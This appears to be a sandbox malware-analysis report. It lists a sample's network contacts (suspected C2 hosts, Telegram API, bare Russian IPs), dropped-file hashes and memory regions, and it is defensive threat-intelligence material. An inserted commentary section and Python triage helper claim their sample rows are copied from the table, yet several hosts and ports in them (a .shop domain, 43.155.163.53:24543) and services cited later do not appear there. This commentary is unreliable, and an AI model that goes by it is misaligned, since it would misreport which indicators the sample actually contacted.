| US | 8.8.8.8:53 | 79.210.1.212.in-addr.arpa | udp |
| DE | 136.243.76.170:135 | | tcp |
| US | 8.8.8.8:53 | crl.crlocsp.cn | udp |
| CN | 180.163.251.149:80 | crl.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | ocsp.crlocsp.cn | udp |
| US | 101.198.193.5:80 | ocsp.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.193.198.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.21.199.152.in-addr.arpa | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 94.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| DE | 136.243.76.170:445 | | tcp |
| RU | 5.42.65.67:48396 | | tcp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| DE | 136.243.76.170:139 | | tcp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | 67.65.42.5.in-addr.arpa | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| GB | 99.86.249.221:80 | sd.p.360safe.com | tcp |
| CN | 171.8.167.65:80 | crl.crlocsp.cn | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.50:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | 120.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 29.73.42.20.in-addr.arpa | udp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.50:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.50:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | orion.ts.360.com | udp |
| NL | 82.145.215.156:443 | orion.ts.360.com | tcp |
| RU | 91.215.85.135:80 | 91.215.85.135 | tcp |
| US | 8.8.8.8:53 | ocsp.crlocsp.cn | udp |
| CN | 101.198.2.196:80 | crl.crlocsp.cn | tcp |
| US | 101.198.193.5:80 | ocsp.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | 156.215.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 101.198.193.5:80 | ocsp.crlocsp.cn | tcp |
| US | 8.8.8.8:53 | beshomandotestbesnd.run.place | udp |
| US | 45.88.186.125:7000 | beshomandotestbesnd.run.place | tcp |
| US | 8.8.8.8:53 | 125.186.88.45.in-addr.arpa | udp |
| N/A | 127.0.0.1:52407 | | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | api4.check-data.xyz | udp |
| US | 44.237.26.169:80 | api4.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 169.26.237.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 212.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dcxZfVrOkE.dcxZfVrOkE | udp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 52.182.143.212:443 | nw-umwatson.events.data.microsoft.com | tcp |
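The connection table above is raw sandbox output: resolver queries to 8.8.8.8, reverse (PTR) lookups of every address the sample touched, and probes of the sandbox's own LAN sit next to the hosting and C2 contacts that actually matter. The following Python is an added triage helper, not part of this report or of any tool it names. It parses rows in the table's own `| CC | ip:port | domain | proto |` layout, tolerates the exported rows where the protocol slipped into the domain column, and returns the names the sample resolved plus the distinct external contacts, flagging non-standard ports and connections made to a bare IP. The sample rows are copied from the table above; the resolver address and the set of "expected" ports are assumptions stated in the code.

```python
import ipaddress
import re
from collections import OrderedDict

# Constructed sample: rows copied from the connection table above, including
# the exported form where the protocol sits in the domain column ('| tcp | |').
SAMPLE_ROWS = """\
| US | 8.8.8.8:53 | considerrycurrentyws.shop | udp |
| US | 172.67.170.57:443 | considerrycurrentyws.shop | tcp |
| US | 8.8.8.8:53 | 9.90.103.94.in-addr.arpa | udp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| KR | 43.155.163.53:24543 | tcp | |
| KR | 43.155.163.53:24543 | | tcp |
| N/A | 10.127.0.1:135 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 45.88.186.125:7000 | beshomandotestbesnd.run.place | tcp |
"""

ROW_RE = re.compile(
    r"^\|\s*(?P<cc>[^|]+?)\s*\|\s*(?P<ip>[\d.]+):(?P<port>\d+)\s*\|"
    r"\s*(?P<c3>[^|]*?)\s*\|\s*(?P<c4>[^|]*?)\s*\|\s*$"
)
RESOLVER = ("8.8.8.8", 53)      # assumption: the sandbox's upstream resolver
EXPECTED_PORTS = {80, 443}      # assumption: anything else gets called out


def parse_row(line):
    """Return (cc, ip, port, domain, proto) for one table row, or None.
    Rows exported as '| ip:port | tcp | |' are read as having no domain."""
    m = ROW_RE.match(line)
    if m is None:
        return None
    c3, c4 = m["c3"], m["c4"]
    if c3.lower() in ("tcp", "udp") and not c4:
        domain, proto = "", c3.lower()
    else:
        domain, proto = c3, c4.lower()
    return m["cc"], m["ip"], int(m["port"]), domain, proto


def triage(table_text):
    """Return (queried, contacts): the distinct names the sample resolved,
    PTR lookups excluded, and a mapping 'host:port/proto' -> flags for every
    direct connection that is not resolver traffic or sandbox-LAN noise."""
    queried = OrderedDict()
    contacts = OrderedDict()
    for line in table_text.splitlines():
        parsed = parse_row(line)
        if parsed is None:
            continue
        _cc, ip, port, domain, proto = parsed
        addr = ipaddress.ip_address(ip)
        if (ip, port) == RESOLVER:
            # The queried name is the IOC; the resolver itself is not.
            if domain and not domain.endswith(".in-addr.arpa"):
                queried[domain] = None
            continue
        if addr.is_private or addr.is_loopback:
            continue  # SMB/RPC probes of the sandbox LAN, not an external contact
        host = domain or ip
        flags = []
        if port not in EXPECTED_PORTS:
            flags.append("non-standard port")
        if not domain or domain == ip:
            flags.append("bare IP, no hostname")
        contacts.setdefault(f"{host}:{port}/{proto}", flags)
    return list(queried), contacts


if __name__ == "__main__":
    names, hosts = triage(SAMPLE_ROWS)
    print("resolved:", ", ".join(names))
    for key, flags in hosts.items():
        print(key, ("  <-- " + "; ".join(flags)) if flags else "")
```

Run against the full table, the output is the list to feed a blocklist or a retro-hunt: the Cloudflare-fronted `.shop` names (Lumma-style C2 rotation), the bare-IP hosting contacts on port 80, and the high-port connections such as 43.155.163.53:24543 and 45.88.186.125:7000. Legitimate services the sample abuses (raw.githubusercontent.com, pastebin.com, api.telegram.org, the IP-lookup sites) will also appear and need a human to decide whether to block the host or only the specific URL.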
Files
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5aa17e67da5390729352ed4a11da1990 |
| SHA1 | e47a79137c6fa29f5d3e4610cdfefaa7beb4e71e |
| SHA256 | 5962a7fff106f931b3337fe04db08fa73b386e2e2675895b37950d906971054e |
| SHA512 | 62596db2b42b1becae325f078f55d53dfb15f69eb72c559222602d3a688fd2327c73c36a4fb88924e77e36e869dbbeb075352fb8111e6479c7509681a923b6ae |
\??\pipe\crashpad_748_HGVHDWTQEVDKMGAJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 707d86571e1fa66f657f146c22eac81c |
| SHA1 | bcfdab90abbc393679a9498931395bb6b714d259 |
| SHA256 | 8a1e2446ae46ea48bfa7d7d22a64527f238ef5a22d3cd6265e33c7e0299f9942 |
| SHA512 | ca55ba3264ba992e64be53c3d730c1836f673ef6aef4a5e901ea7805cc4c7a968b9347a4f833ad7fe9b522f5b0c366d0f27793b676282df92b1eeedba1a88602 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3a3774f1e1dfa713e94367b732380ef6 |
| SHA1 | 01e92aadf0615e89c79d28bdd428db2023ccc838 |
| SHA256 | 6b5d732abd145f51f56b2a95ca65584c318b9378f1ad68b2491e95ba11113f07 |
| SHA512 | d3a316ab450fa137fe5a11b7dbe10b6e0da80c532e61eecec946ddd1712d973c9b1c35f9b374a43c91f2500fcc1575545b00d498429a5845c58c0e2c0bd9e034 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e848fa92fe1d62b21d5253282567f648 |
| SHA1 | 8b687fc65819f9f40269832a1a3c6f18b8444577 |
| SHA256 | 747b6e0744a36b9b912019b6c32aac21574c2fe63c4864c28715f0ff7659b9e5 |
| SHA512 | df1e526d100ae701c16e519a1b51c74b26529452df72e5b108795870ff47efe1a7e50394118a87d0ddb7b8a3d87c37d560a9d5c54160f5ddd53b6e91b83582ab |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 780adb3243645be6504937c61b57d9b6 |
| SHA1 | 16ee22c4c46750610c33ff836ab61438b6b668fb |
| SHA256 | 32eb6f8b7ea77b307041afcdd337bf54b91f17db9fb5b1d0f4213ed19e08b64c |
| SHA512 | 14121143d277885345fdce2a8c9dec8d7a3b9ca6f4a5ae7419ff775fd231ac9e0228f2d35a319b5b7740404ec1ab94de694374fa5d2a3c468c9cad9facb7090c |
memory/336-177-0x00007FF9FB9B3000-0x00007FF9FB9B5000-memory.dmp
memory/336-176-0x00000000008E0000-0x00000000008E8000-memory.dmp
C:\Users\Admin\Desktop\a\volumeinfo.exe
| MD5 | e817cc929fbc651c5bdab9e8cca0d9d9 |
| SHA1 | 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f |
| SHA256 | 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282 |
| SHA512 | a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f |
memory/4564-189-0x00000000007E0000-0x0000000000A20000-memory.dmp
memory/4564-190-0x0000000005510000-0x000000000572C000-memory.dmp
memory/4564-191-0x0000000006860000-0x0000000006A7E000-memory.dmp
memory/4564-192-0x0000000007030000-0x00000000075D4000-memory.dmp
memory/4564-193-0x0000000006B20000-0x0000000006BB2000-memory.dmp
memory/4564-195-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-194-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-197-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-237-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-249-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-257-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-255-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-253-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-251-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-247-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-245-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-243-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-241-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-239-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-235-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-231-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-229-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-227-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-225-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-223-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-219-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-217-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-233-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-221-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-215-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-211-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-209-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-206-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-201-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-199-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-213-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-207-0x0000000006860000-0x0000000006A78000-memory.dmp
memory/4564-203-0x0000000006860000-0x0000000006A78000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 7c7c63fb99b7621550cb034d76666d24 |
| SHA1 | 478b7034698beddd03bf0542e92ce3386041bf57 |
| SHA256 | e1c8a5f6c2944ca244e8477a534afc073aba8e8d562ac4ca2d303e5e6e5a4b15 |
| SHA512 | 55932db96894bc05cf5f6d285d69604a79124bfcee199d390ca6b9c321dab93f3031a4f8a38d85f05b36d2699953f14f983cd6f518e5084f55e96b2bfec302a3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 085064d16437307715ff3d7b49379b25 |
| SHA1 | 250d7675e776aa739b4384d8d3d25ebd2c159959 |
| SHA256 | a86cd2400324c09420654e509c063fd9f5a465e3a9562012c4667b03a681c189 |
| SHA512 | cd9f4e3d1c5d0f24d55a145e6f7bcc8af8547c31f9969ff6589776a98989ae94076267144cdfb09599ed8d223b2f776675d6614cf8907be431320002d31ebb46 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58fc7c.TMP
| MD5 | cc9c4a413c2dc4c34c7927e8b2a1dd7c |
| SHA1 | 3fde38f285123676c89d1a755f3b5b1ada4b94ec |
| SHA256 | be096340b9f012551aeb6ce7b5e533f415122bc76c391dc43f10f1d1db8c7872 |
| SHA512 | 07d74b5051ae28f3e9bdf0e0b3d0443d7889dd0e27843783988cdacdf81c11bca821aea86be8580ac2e827a07b542dd7a4961bf06fcffc4ff54ad9f2c6a95b26 |
memory/4564-5109-0x0000000006C30000-0x0000000006C88000-memory.dmp
memory/4564-5110-0x0000000006C90000-0x0000000006CDC000-memory.dmp
C:\Users\Admin\Desktop\a\Zinker.exe
| MD5 | b11913361b2d4c43c00c1969184050a8 |
| SHA1 | 8358fa3426e4136e0873a32f49f5f367770bad0a |
| SHA256 | de39bc2c5f18ae468501a573ee5cb9b22f2f608ec2fc51954b44d4549fac2a57 |
| SHA512 | 2d25c021ddf59a10b63c56d85a550e7454767444472f3e40662dda1e1dddeef551202253cf9137bf4054ed832cd59c53b66aba6d42361f044fe4e7b06bef2026 |
C:\Users\Admin\Desktop\a\smartsoftsignew.exe
| MD5 | dd7b3d075cc843de37f20545669216ba |
| SHA1 | 355fcbf44674f0380153aa07a704c10c1043d499 |
| SHA256 | 9fda36eb2fdc5a0befb6021bdc1bdbecb843da8ff68eea84d418eaf47bebfbdc |
| SHA512 | dbca5bb9c8c4b7cd2be52c9932dae0a4718874570d9a82ea5307edf6e7904f17f7aa5e60f1b2c0efe53c0116c4f623f89df98b203237d27f18b2895fad29a8c6 |
C:\Users\Admin\Desktop\a\smartsoftsignew.exe
| MD5 | 66a5a529386533e25316942993772042 |
| SHA1 | 053d0d7f4cb6e3952e849f02bbfbdb4d39021146 |
| SHA256 | 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94 |
| SHA512 | 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a |
C:\Users\Admin\Desktop\a\ADServices.exe
| MD5 | 0c2564813f2b9fc088cfb6938214d3cb |
| SHA1 | cbb0bc2dfe83d38b9e4a8e47d182e6d7ee6a29b0 |
| SHA256 | 1043faf46b5a19cbe10410e01725b38caf0db7f36b73c68e103ebca8da2d18d2 |
| SHA512 | 06d4df2ed5d79c1d33ca06d977d936643c78139f484747bdfaac690b84f064620a6dc33014b0146acebce4e935688dc2a1445e7e2f830ec3b75e5e2dafa02ed1 |
C:\Users\Admin\AppData\Local\Temp\nsi1777.tmp\UAC.dll
| MD5 | adb29e6b186daa765dc750128649b63d |
| SHA1 | 160cbdc4cb0ac2c142d361df138c537aa7e708c9 |
| SHA256 | 2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08 |
| SHA512 | b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada |
C:\Users\Admin\AppData\Local\Temp\nsi1777.tmp\nsExec.dll
| MD5 | 132e6153717a7f9710dcea4536f364cd |
| SHA1 | e39bc82c7602e6dd0797115c2bd12e872a5fb2ab |
| SHA256 | d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2 |
| SHA512 | 9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1 |
C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat
| MD5 | f6423b02fa9b2de5b162826b26c0dc56 |
| SHA1 | 01e7e79e6018c629ca11bc30f15a1a3e6988773e |
| SHA256 | 59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83 |
| SHA512 | 5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459 |
memory/5504-5154-0x0000000002B90000-0x0000000002BC6000-memory.dmp
memory/5816-5155-0x000000001BBF0000-0x000000001C0BE000-memory.dmp
memory/5816-5156-0x000000001C170000-0x000000001C216000-memory.dmp
memory/5504-5157-0x0000000005480000-0x0000000005AA8000-memory.dmp
C:\Users\Admin\Desktop\a\New.exe
| MD5 | 384cc82bf0255c852430dc13e1069276 |
| SHA1 | 26467194c29d444e5373dfdde2ff2bca1c12ef9a |
| SHA256 | ba2567627674eada0b5462b673cdea4ed11a063174c87b775927db7e7d6ef99c |
| SHA512 | 7838ee81a8d13c3722627424270ac877081afc399be862ce9b1614a1df3c12f98066d28f2a9a81bcf626f14fe90d83ef8039cd679f40851f2d6d83c3839e73be |
memory/5424-5169-0x0000014218960000-0x000001421896A000-memory.dmp
memory/5504-5170-0x0000000005400000-0x0000000005422000-memory.dmp
memory/5504-5172-0x0000000005B90000-0x0000000005BF6000-memory.dmp
memory/5504-5171-0x0000000005B20000-0x0000000005B86000-memory.dmp
memory/5504-5178-0x0000000005C00000-0x0000000005F54000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yxq25wfj.r5x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
| MD5 | 2de14d82238bf5395e0b95e551ab8e00 |
| SHA1 | f9c7f00ad7c624d190e06cda3c5adf02bb207074 |
| SHA256 | aa9d5004f89fe3952e5ee0b148e6a36574d372bb5ffadae5733a7ee77127f8d4 |
| SHA512 | 9a5f2f781b52ea793021bf641a8be95f9611bfe936e9bd96978ec9066b4a7390b847f2e597cfd9ac69de9ac35b7238147538a23c3a27313d19c16258e2446f2a |
memory/5504-5187-0x00000000061B0000-0x00000000061FC000-memory.dmp
memory/5504-5186-0x0000000006190000-0x00000000061AE000-memory.dmp
C:\Users\Admin\Desktop\a\GTA_V.exe
| MD5 | c7c4cf01397f037bc3f0b9a08d54b05c |
| SHA1 | 22f35045866e21261d16919dde62b9133db04263 |
| SHA256 | 1e2a2fde956c86355da886f4cf2f0e53a5e9d3480e02da72ede7a6c62b6ca147 |
| SHA512 | e659f997fddcc4ed6322d1759a357c3babdd01108ff3b077f7e213f46ddb549873250ba7f5a55618ae72db8f5a1a0f7417e1d5c9aaae3948e3c91fa16dfad750 |
C:\Users\Admin\AppData\Local\Temp\{3ED45B86-B977-47bd-8150-2ED2A89934C6}.tmp\360P2SP.dll
| MD5 | fc1796add9491ee757e74e65cedd6ae7 |
| SHA1 | 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812 |
| SHA256 | bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60 |
| SHA512 | 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d |
memory/5504-5216-0x00000000079D0000-0x000000000804A000-memory.dmp
memory/5504-5217-0x00000000066A0000-0x00000000066BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
| MD5 | e6edb41c03bce3f822020878bde4e246 |
| SHA1 | 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9 |
| SHA256 | 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454 |
| SHA512 | 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 184a117024f3789681894c67b36ce990 |
| SHA1 | c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e |
| SHA256 | b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e |
| SHA512 | 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7 |
memory/5424-5239-0x0000014232F60000-0x0000014232FC8000-memory.dmp
memory/1792-5243-0x0000000000400000-0x0000000000416000-memory.dmp
memory/4852-5255-0x00000230B23B0000-0x00000230B23D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{34FF3024-228D-4136-B51F-211E96B4C78E}.tmp
| MD5 | b1ddd3b1895d9a3013b843b3702ac2bd |
| SHA1 | 71349f5c577a3ae8acb5fbce27b18a203bf04ede |
| SHA256 | 46cda5ad256bf373f5ed0b2a20efa5275c1ffd96864c33f3727e76a3973f4b3c |
| SHA512 | 93e6c10c4a8465bc2e58f4c7eb300860186ddc5734599bcdad130ff9c8fd324443045eac54bbc667b058ac1fa271e5b7645320c6e3fc2f28cc5f824096830de1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3a6bad9528f8e23fb5c77fbd81fa28e8 |
| SHA1 | f127317c3bc6407f536c0f0600dcbcf1aabfba36 |
| SHA256 | 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05 |
| SHA512 | 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2 |
C:\Users\Admin\AppData\Local\Temp\putty.zip
| MD5 | 188fbf5c7b5748e1f750be2bab44e0a0 |
| SHA1 | 525afccfc532830f71f068acfbf9ac49a1463539 |
| SHA256 | 14a23a25c21deba6f3a85d2e24085a95881302499bcdde6dc9a585fe46b9f370 |
| SHA512 | 62d6232ec09e266585f29c9fe335a6f02cfc0dbd8aa02545b0648eec7424aa25c4138cff49015073aede2a45506c056cbaa592cfc5d3a537313d9ee5bf1c6608 |
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
| MD5 | 7a9a33206f80078ba80f7a839cd92451 |
| SHA1 | 55447378c48561c35bad1317b58a34ee50c5072f |
| SHA256 | e53c379d95e95706c5a2c4d6cd609857368a3bf14f28d7e67f6e3f8dfce6d486 |
| SHA512 | 61873ed9b7616de998eff2ca90c6698cb0df87d181344fc6e02fd70fcd87fd8028cfdb7f606a3637514463982c161549729145118190e42b7f47365716f23aba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 612a6c4247ef652299b376221c984213 |
| SHA1 | d306f3b16bde39708aa862aee372345feb559750 |
| SHA256 | 9d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a |
| SHA512 | 34a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
